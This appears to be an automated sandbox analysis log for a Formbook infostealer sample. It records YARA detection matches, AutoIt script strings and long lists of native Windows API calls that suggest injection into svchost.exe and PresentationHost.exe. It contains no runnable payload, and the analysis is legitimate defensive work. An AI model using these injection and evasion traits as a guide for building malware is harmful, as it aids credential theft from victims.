          Source: Yara match | File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: This is a third-party compiled AutoIt script. (0_2_00603B4C)
          Source: nJ8mJTmMf0.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_26fbddc7-f)
          Source: nJ8mJTmMf0.exe, 00000000.00000000.1651855029.00000000006B5000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_eaed8490-7)
          Source: nJ8mJTmMf0.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_09d7f7ca-c)
          Source: nJ8mJTmMf0.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_6dae6a55-d)
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042B083 NtClose,1_2_0042B083
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274340 NtSetContextThread,1_2_03274340
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274650 NtSuspendThread,1_2_03274650
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F30 NtCreateSection,1_2_03272F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C60 NtCreateKey,1_2_03272C60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C70 NtFreeVirtualMemory,1_2_03272C70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273090 NtSetValueKey,1_2_03273090
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03273D70 NtOpenThread,1_2_03273D70
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F54650 NtSuspendThread,LdrInitializeThunk,6_2_04F54650
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F54340 NtSetContextThread,LdrInitializeThunk,6_2_04F54340
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04F52CA0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04F52C70
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52C60 NtCreateKey,LdrInitializeThunk,6_2_04F52C60
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04F52DF0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52DD0 NtDelayExecution,LdrInitializeThunk,6_2_04F52DD0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04F52D30
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04F52D10
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04F52EE0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04F52E80
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52FE0 NtCreateFile,LdrInitializeThunk,6_2_04F52FE0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52FB0 NtResumeThread,LdrInitializeThunk,6_2_04F52FB0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52F30 NtCreateSection,LdrInitializeThunk,6_2_04F52F30
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52AF0 NtWriteFile,LdrInitializeThunk,6_2_04F52AF0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52AD0 NtReadFile,LdrInitializeThunk,6_2_04F52AD0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04F52BF0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04F52BE0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04F52BA0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52B60 NtClose,LdrInitializeThunk,6_2_04F52B60
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F535C0 NtCreateMutant,LdrInitializeThunk,6_2_04F535C0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F539B0 NtGetContextThread,LdrInitializeThunk,6_2_04F539B0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52CF0 NtOpenProcess,6_2_04F52CF0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52CC0 NtQueryVirtualMemory,6_2_04F52CC0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52C00 NtQueryInformationProcess,6_2_04F52C00
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52DB0 NtEnumerateKey,6_2_04F52DB0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52D00 NtSetInformationFile,6_2_04F52D00
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52EA0 NtAdjustPrivilegesToken,6_2_04F52EA0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52E30 NtWriteVirtualMemory,6_2_04F52E30
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52FA0 NtQuerySection,6_2_04F52FA0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52F90 NtProtectVirtualMemory,6_2_04F52F90
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52F60 NtCreateProcessEx,6_2_04F52F60
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52AB0 NtWaitForSingleObject,6_2_04F52AB0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F52B80 NtQueryInformationFile,6_2_04F52B80
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F53090 NtSetValueKey,6_2_04F53090
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F53010 NtOpenDirectoryObject,6_2_04F53010
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F53D70 NtOpenThread,6_2_04F53D70
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_04F53D10 NtOpenProcessToken,6_2_04F53D10
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B27BA0 NtCreateFile,6_2_00B27BA0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B27DE0 NtDeleteFile,6_2_00B27DE0
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B27D00 NtReadFile,6_2_00B27D00
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B27E70 NtClose,6_2_00B27E70
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B27FC0 NtAllocateVirtualMemory,6_2_00B27FC0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00664021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00664021
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00658858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00658858
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0066545F
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F94F406_2_04F94F40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F40F306_2_04F40F30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC2F306_2_04FC2F30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F62F286_2_04F62F28
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F4E8F06_2_04F4E8F0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F068B86_2_04F068B8
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F228406_2_04F22840
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2A8406_2_04F2A840
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F229A06_2_04F229A0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FEA9A66_2_04FEA9A6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F369626_2_04F36962
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F1EA806_2_04F1EA80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD6BD76_2_04FD6BD7
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDAB406_2_04FDAB40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F114606_2_04F11460
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF43F6_2_04FDF43F
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FE95C36_2_04FE95C3
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBD5B06_2_04FBD5B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD75716_2_04FD7571
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD16CC6_2_04FD16CC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F656306_2_04F65630
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF7B06_2_04FDF7B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD70E96_2_04FD70E9
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDF0E06_2_04FDF0E0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FCF0CC6_2_04FCF0CC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F270C06_2_04F270C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F2B1B06_2_04F2B1B0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F0F1726_2_04F0F172
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FEB16B6_2_04FEB16B
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F5516C6_2_04F5516C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3D2F06_2_04F3D2F0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC12ED6_2_04FC12ED
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3B2C06_2_04F3B2C0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F252A06_2_04F252A0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F6739A6_2_04F6739A
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F0D34C6_2_04F0D34C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD132D6_2_04FD132D
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFCF26_2_04FDFCF2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F99C326_2_04F99C32
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3FDC06_2_04F3FDC0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD7D736_2_04FD7D73
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD1D5A6_2_04FD1D5A
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F23D406_2_04F23D40
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F29EB06_2_04F29EB0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04EE3FD56_2_04EE3FD5
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04EE3FD26_2_04EE3FD2
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFFB16_2_04FDFFB1
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F21F926_2_04F21F92
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFF096_2_04FDFF09
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F238E06_2_04F238E0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F8D8006_2_04F8D800
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F299506_2_04F29950
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3B9506_2_04F3B950
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FB59106_2_04FB5910
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FCDAC66_2_04FCDAC6
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F65AA06_2_04F65AA0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FBDAAC6_2_04FBDAAC
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FC1AA36_2_04FC1AA3
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F93A6C6_2_04F93A6C
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFA496_2_04FDFA49
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FD7A466_2_04FD7A46
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F95BF06_2_04F95BF0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F5DBF96_2_04F5DBF9
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04F3FB806_2_04F3FB80
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04FDFB766_2_04FDFB76
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B119006_2_00B11900
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B2A2806_2_00B2A280
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0CB306_2_00B0CB30
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0ADD06_2_00B0ADD0
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B0CD506_2_00B0CD50
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B134206_2_00B13420
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B1341B6_2_00B1341B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00607F41 appears 35 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00620D27 appears 70 times
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: String function: 00628B40 appears 42 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F67E54 appears 107 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F9F290 appears 103 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F0B970 appears 262 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F8EA12 appears 86 times
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: String function: 04F55130 appears 58 times
          Source: nJ8mJTmMf0.exe, 00000000.00000003.1661289845.000000000400D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
          Source: nJ8mJTmMf0.exe, 00000000.00000003.1661178255.0000000003E63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
          Source: nJ8mJTmMf0.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066A2D5 GetLastError,FormatMessageW,0_2_0066A2D5
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658713 AdjustTokenPrivileges,CloseHandle,0_2_00658713
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00658CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00658CC3
